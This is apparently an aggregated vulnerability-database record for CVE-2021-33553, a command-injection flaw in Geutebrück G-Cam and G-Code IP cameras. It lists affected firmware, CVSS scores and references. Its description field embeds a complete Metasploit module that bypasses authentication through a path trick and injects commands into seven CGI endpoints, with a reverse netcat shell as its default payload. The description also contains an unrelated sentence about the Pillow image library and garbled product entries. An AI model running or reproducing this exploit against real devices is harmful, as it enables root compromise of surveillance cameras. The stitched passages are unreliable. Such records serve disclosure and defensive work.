ID

VAR-202109-0849


CVE

CVE-2021-33553


TITLE

GEUTEBRUCK  Made  G-Cam E2  and  G-Code  Multiple vulnerabilities in

Trust: 0.8

sources: JVNDB: JVNDB-2021-002023

DESCRIPTION

Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. }, 'Author' => [ 'Titouan Lazard', # Of RandoriSec - Discovery 'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module 'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2021-33543'], ['CVE', '2021-33544'], ['CVE', '2021-33548'], ['CVE', '2021-33550'], ['CVE', '2021-33551'], ['CVE', '2021-33552'], ['CVE', '2021-33553'], ['CVE', '2021-33554'], [ 'URL', 'http://geutebruck.com' ], [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'], [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03'] ], 'DisclosureDate' => '2021-07-08', 'Privileged' => true, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD], 'Targets' => [ [ 'CVE-2021-33544 - certmngr.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'createselfcert', 'local' => Rex::Text.rand_text_alphanumeric(10..16), 'country' => Rex::Text.rand_text_alphanumeric(2), 'state' => '$(PLACEHOLDER_CMD)', 'organization' => Rex::Text.rand_text_alphanumeric(10..16), 'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16), 'commonname' => Rex::Text.rand_text_alphanumeric(10..16), 'days' => Rex::Text.rand_text_numeric(2..4), 'type' => Rex::Text.rand_text_numeric(2..4) }, 'uri' => '/../uapi-cgi/certmngr.cgi' } ], [ 'CVE-2021-33548 - factory.cgi', { 'http_method' => 'GET', 'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/factory.cgi' } ], [ 'CVE-2021-33550 - language.cgi', { 'http_method' => 'GET', 'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/language.cgi' } ], [ 'CVE-2021-33551 - oem.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'set', 'enable' => 'yes', 'environment.lang' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/oem.cgi' } ], [ 'CVE-2021-33552 - simple_reclistjs.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'get', 'timekey' => Rex::Text.rand_text_numeric(2..4), 'date' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/simple_reclistjs.cgi' } ], [ 'CVE-2021-33553 - testcmd.cgi', { 'http_method' => 'GET', 'http_vars' => { 'command' => 'PLACEHOLDER_CMD' }, 'uri' => '/../uapi-cgi/testcmd.cgi' } ], [ 'CVE-2021-33554 - tmpapp.cgi', { 'http_method' => 'GET', 'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/tmpapp.cgi' } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' }, 'Notes' => { 'Stability' => ['CRASH_SAFE'], 'Reliability' => ['REPEATABLE_SESSION'], 'SideEffects' => ['ARTIFACTS_ON_DISK'] } ) ) end def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end unless res&.body && !res.body.empty? print_error('Empty body in the response!') return false end res_xml = res.get_xml_document if res_xml.at('//firmware').nil? print_error('Target did not respond with a XML document containing the "firmware" element!') return false end raw_text = res_xml.at('//firmware').text if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/) raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0] else print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!') false end end def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end rex_version = Rex::Version.new(version) vprint_status("Found Geutebruck version #{rex_version}") if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5') return CheckCode::Appears end CheckCode::Safe end def exploit print_status("#{rhost}:#{rport} - Setting up request...") method = target['http_method'] if method == 'GET' http_method_vars = 'vars_get' else http_method_vars = 'vars_post' end http_vars = target['http_vars'] http_vars.each do |(k, v)| if v.include? 'PLACEHOLDER_CMD' http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded end end print_status("Sending CMD injection request to #{rhost}:#{rport}") send_request_cgi( { 'method' => method, 'uri' => target['uri'], http_method_vars => http_vars } ) print_status('Exploit complete, you should get a shell as the root user!') end end

Trust: 2.34

sources: NVD: CVE-2021-33553 // JVNDB: JVNDB-2021-002023 // CNNVD: CNNVD-202104-975 // VULMON: CVE-2021-33553 // PACKETSTORM: 164036

IOT TAXONOMY

category:['camera device']sub_category:camera

Trust: 0.1

sources: OTHER: None

AFFECTED PRODUCTS

vendor:geutebrueckmodel:g-code een-2010scope:eqversion:1.12.14.5

Trust: 1.0

vendor:geutebrueckmodel:g-cam ebc-2110scope:eqversion:1.12.13.2

Trust: 1.0

vendor:geutebrueckmodel:g-cam ebc-2112scope:lteversion:1.12.0.27

Trust: 1.0

vendor:geutebrueckmodel:g-cam efd-2250scope:eqversion:1.12.13.2

Trust: 1.0

vendor:geutebrueckmodel:g-cam ewpc-2275scope:lteversion:1.12.0.27

Trust: 1.0

vendor:geutebrueckmodel:g-code een-2040scope:eqversion:1.12.13.2

Trust: 1.0

vendor:geutebrueckmodel:g-cam ewpc-2271scope:eqversion:1.12.13.2

Trust: 1.0

vendor:geutebrueckmodel:g-cam ebc-2111scope:eqversion:1.12.13.2

Trust: 1.0

vendor:geutebrueckmodel:g-cam ethc-2239scope:eqversion:1.12.13.2

Trust: 1.0

vendor:geutebrueckmodel:g-cam ethc-2230scope:eqversion:1.12.14.5

Trust: 1.0

vendor:geutebrueckmodel:g-cam ethc-2249scope:eqversion:1.12.14.5

Trust: 1.0

vendor:geutebrueckmodel:g-code een-2010scope:eqversion:1.12.13.2

Trust: 1.0

vendor:geutebrueckmodel:g-cam efd-2241scope:eqversion:1.12.14.5

Trust: 1.0

vendor:geutebrueckmodel:g-cam ebc-2110scope:lteversion:1.12.0.27

Trust: 1.0

vendor:geutebrueckmodel:g-code een-2040scope:lteversion:1.12.0.27

Trust: 1.0

vendor:geutebrueckmodel:g-cam ewpc-2271scope:lteversion:1.12.0.27

Trust: 1.0

vendor:geutebrueckmodel:g-cam ebc-2111scope:lteversion:1.12.0.27

Trust: 1.0

vendor:geutebrueckmodel:g-cam ethc-2239scope:lteversion:1.12.0.27

Trust: 1.0

vendor:geutebrueckmodel:g-cam efd-2250scope:lteversion:1.12.0.27

Trust: 1.0

vendor:geutebrueckmodel:g-cam ethc-2249scope:eqversion:1.12.13.2

Trust: 1.0

vendor:geutebrueckmodel:g-cam ethc-2230scope:eqversion:1.12.13.2

Trust: 1.0

vendor:geutebrueckmodel:g-cam ewpc-2270scope:eqversion:1.12.14.5

Trust: 1.0

vendor:geutebrueckmodel:g-code eec-2400scope:eqversion:1.12.14.5

Trust: 1.0

vendor:geutebrueckmodel:g-code een-2010scope:lteversion:1.12.0.27

Trust: 1.0

vendor:geutebrueckmodel:g-cam efd-2241scope:eqversion:1.12.13.2

Trust: 1.0

vendor:geutebrueckmodel:g-cam ethc-2240scope:eqversion:1.12.14.5

Trust: 1.0

vendor:geutebrueckmodel:g-cam efd-2251scope:eqversion:1.12.14.5

Trust: 1.0

vendor:geutebrueckmodel:g-cam ethc-2230scope:lteversion:1.12.0.27

Trust: 1.0

vendor:geutebrueckmodel:g-cam efd-2241scope:lteversion:1.12.0.27

Trust: 1.0

vendor:geutebrueckmodel:g-code eec-2400scope:eqversion:1.12.13.2

Trust: 1.0

vendor:geutebrueckmodel:g-cam ewpc-2270scope:eqversion:1.12.13.2

Trust: 1.0

vendor:geutebrueckmodel:g-cam ethc-2249scope:lteversion:1.12.0.27

Trust: 1.0

vendor:geutebrueckmodel:g-code eec-2400scope:lteversion:1.12.0.27

Trust: 1.0

vendor:geutebrueckmodel:g-cam ethc-2240scope:eqversion:1.12.13.2

Trust: 1.0

vendor:geutebrueckmodel:g-cam efd-2251scope:eqversion:1.12.13.2

Trust: 1.0

vendor:geutebrueckmodel:g-cam ewpc-2275scope:eqversion:1.12.14.5

Trust: 1.0

vendor:geutebrueckmodel:g-cam ebc-2112scope:eqversion:1.12.14.5

Trust: 1.0

vendor:geutebrueckmodel:g-cam ewpc-2270scope:lteversion:1.12.0.27

Trust: 1.0

vendor:geutebrueckmodel:g-cam ewpc-2275scope:eqversion:1.12.13.2

Trust: 1.0

vendor:geutebrueckmodel:g-cam ebc-2110scope:eqversion:1.12.14.5

Trust: 1.0

vendor:geutebrueckmodel:g-cam efd-2250scope:eqversion:1.12.14.5

Trust: 1.0

vendor:geutebrueckmodel:g-cam efd-2251scope:lteversion:1.12.0.27

Trust: 1.0

vendor:geutebrueckmodel:g-cam ethc-2240scope:lteversion:1.12.0.27

Trust: 1.0

vendor:geutebrueckmodel:g-code een-2040scope:eqversion:1.12.14.5

Trust: 1.0

vendor:geutebrueckmodel:g-cam ebc-2112scope:eqversion:1.12.13.2

Trust: 1.0

vendor:geutebrueckmodel:g-cam ewpc-2271scope:eqversion:1.12.14.5

Trust: 1.0

vendor:geutebrueckmodel:g-cam ebc-2111scope:eqversion:1.12.14.5

Trust: 1.0

vendor:geutebrueckmodel:g-cam ethc-2239scope:eqversion:1.12.14.5

Trust: 1.0

vendor:geutebruckmodel: - scope:eqversion:‥ * firmware 1.12.13.2 1.12.14.5

Trust: 0.8

vendor:geutebruckmodel: - scope:eqversion:* een-20xx

Trust: 0.8

vendor:geutebruckmodel: - scope:eqversion:* efd-22xx

Trust: 0.8

vendor:geutebruckmodel: - scope:eqversion:* ethc-22xx

Trust: 0.8

vendor:geutebruckmodel: - scope:eqversion:‥ * g-cam

Trust: 0.8

vendor:geutebruckmodel: - scope:eqversion:* eec-2xx

Trust: 0.8

vendor:geutebruckmodel: - scope:eqversion:works with the above firmware s e2 series camera models encoders

Trust: 0.8

vendor:geutebruckmodel: - scope:eqversion: -

Trust: 0.8

vendor:geutebruckmodel: - scope:eqversion:* ebc-21xx

Trust: 0.8

vendor:geutebruckmodel: - scope:eqversion:‥ * g-code

Trust: 0.8

vendor:geutebruckmodel: - scope:eqversion:( multiple products )

Trust: 0.8

vendor:geutebruckmodel: - scope:eqversion:* ewpc-22xx

Trust: 0.8

sources: JVNDB: JVNDB-2021-002023 // NVD: CVE-2021-33553

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2021-33553
value: HIGH

Trust: 1.0

info@cert.vde.com: CVE-2021-33553
value: HIGH

Trust: 1.0

OTHER: JVNDB-2021-002023
value: HIGH

Trust: 0.8

CNNVD: CNNVD-202107-2083
value: HIGH

Trust: 0.6

CNNVD: CNNVD-202104-975
value: MEDIUM

Trust: 0.6

nvd@nist.gov: CVE-2021-33553
severity: MEDIUM
baseScore: 6.5
vectorString: AV:N/AC:L/AU:S/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 8.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.0

nvd@nist.gov: CVE-2021-33553
baseSeverity: HIGH
baseScore: 7.2
vectorString: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: HIGH
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 1.2
impactScore: 5.9
version: 3.1

Trust: 2.0

OTHER: JVNDB-2021-002023
baseSeverity: HIGH
baseScore: 7.2
vectorString: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: HIGH
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: JVNDB: JVNDB-2021-002023 // CNNVD: CNNVD-202107-2083 // CNNVD: CNNVD-202104-975 // NVD: CVE-2021-33553 // NVD: CVE-2021-33553

PROBLEMTYPE DATA

problemtype:CWE-78

Trust: 1.0

problemtype:Command injection (CWE-77) [ Other ]

Trust: 0.8

problemtype: Stack-based buffer overflow (CWE-121) [ Other ]

Trust: 0.8

problemtype: Lack of authentication for important features (CWE-306) [ Other ]

Trust: 0.8

sources: JVNDB: JVNDB-2021-002023 // NVD: CVE-2021-33553

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 164036 // CNNVD: CNNVD-202107-2083

TYPE

operating system commend injection

Trust: 0.6

sources: CNNVD: CNNVD-202107-2083

PATCH

title:GEUTEBRUCK ’ s web portal  (Login required)url:https://portal.geutebrueck.com/

Trust: 0.8

title:Geutebrück G-Cam E2 and G-Code Fixes for command injection vulnerabilitiesurl:http://123.124.177.30/web/xxk/bdxqById.tag?id=158063

Trust: 0.6

sources: JVNDB: JVNDB-2021-002023 // CNNVD: CNNVD-202107-2083

EXTERNAL IDS

db:NVDid:CVE-2021-33553

Trust: 2.7

db:ICS CERTid:ICSA-21-208-03

Trust: 1.7

db:PACKETSTORMid:164036

Trust: 0.8

db:JVNid:JVNVU97817785

Trust: 0.8

db:ICS CERTid:ICSA-21-208-05

Trust: 0.8

db:JVNDBid:JVNDB-2021-002023

Trust: 0.8

db:CXSECURITYid:WLB-2021090031

Trust: 0.6

db:CS-HELPid:SB2021072807

Trust: 0.6

db:AUSCERTid:ESB-2021.2550

Trust: 0.6

db:CNNVDid:CNNVD-202107-2083

Trust: 0.6

db:CS-HELPid:SB2021041363

Trust: 0.6

db:CNNVDid:CNNVD-202104-975

Trust: 0.6

db:OTHERid:NONE

Trust: 0.1

db:VULMONid:CVE-2021-33553

Trust: 0.1

sources: OTHER: None // VULMON: CVE-2021-33553 // JVNDB: JVNDB-2021-002023 // PACKETSTORM: 164036 // CNNVD: CNNVD-202107-2083 // CNNVD: CNNVD-202104-975 // NVD: CVE-2021-33553

REFERENCES

url:https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03

Trust: 2.2

url:https://www.randorisec.fr/fr/udp-technology-ip-camera-vulnerabilities/

Trust: 1.6

url:https://jvn.jp/vu/jvnvu97817785/

Trust: 0.8

url:https://us-cert.cisa.gov/ics/advisories/icsa-21-208-05

Trust: 0.8

url:https://packetstormsecurity.com/files/164036/geutebruck-remote-command-execution.html

Trust: 0.7

url:https://nvd.nist.gov/vuln/detail/cve-2021-33553

Trust: 0.7

url:https://www.auscert.org.au/bulletins/esb-2021.2550

Trust: 0.6

url:https://www.cybersecurity-help.cz/vdb/sb2021072807

Trust: 0.6

url:https://cxsecurity.com/issue/wlb-2021090031

Trust: 0.6

url:https://www.cybersecurity-help.cz/vdb/sb2021041363

Trust: 0.6

url:https://ieeexplore.ieee.org/abstract/document/10769424

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-33543

Trust: 0.1

url:https://github.com/rapid7/metasploit-framework

Trust: 0.1

url:https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-33544

Trust: 0.1

url:https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-33554

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-33551

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-33548

Trust: 0.1

url:https://metasploit.com/download

Trust: 0.1

url:http://geutebruck.com'

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-33550

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2021-33552

Trust: 0.1

sources: OTHER: None // VULMON: CVE-2021-33553 // JVNDB: JVNDB-2021-002023 // PACKETSTORM: 164036 // CNNVD: CNNVD-202107-2083 // CNNVD: CNNVD-202104-975 // NVD: CVE-2021-33553

CREDITS

Titouan Lazard and Ibrahim Ayadhi from RandoriSec reported these vulnerabilities to CISA.

Trust: 0.6

sources: CNNVD: CNNVD-202107-2083

SOURCES

db:OTHERid: -
db:VULMONid:CVE-2021-33553
db:JVNDBid:JVNDB-2021-002023
db:PACKETSTORMid:164036
db:CNNVDid:CNNVD-202107-2083
db:CNNVDid:CNNVD-202104-975
db:NVDid:CVE-2021-33553

LAST UPDATE DATE

2025-01-30T20:38:58.222000+00:00


SOURCES UPDATE DATE

db:JVNDBid:JVNDB-2021-002023date:2021-07-29T08:30:00
db:CNNVDid:CNNVD-202107-2083date:2022-10-08T00:00:00
db:CNNVDid:CNNVD-202104-975date:2021-04-14T00:00:00
db:NVDid:CVE-2021-33553date:2023-11-07T03:35:52.310

SOURCES RELEASE DATE

db:JVNDBid:JVNDB-2021-002023date:2021-07-29T00:00:00
db:PACKETSTORMid:164036date:2021-09-02T15:36:40
db:CNNVDid:CNNVD-202107-2083date:2021-07-27T00:00:00
db:CNNVDid:CNNVD-202104-975date:2021-04-13T00:00:00
db:NVDid:CVE-2021-33553date:2021-09-13T18:15:23.597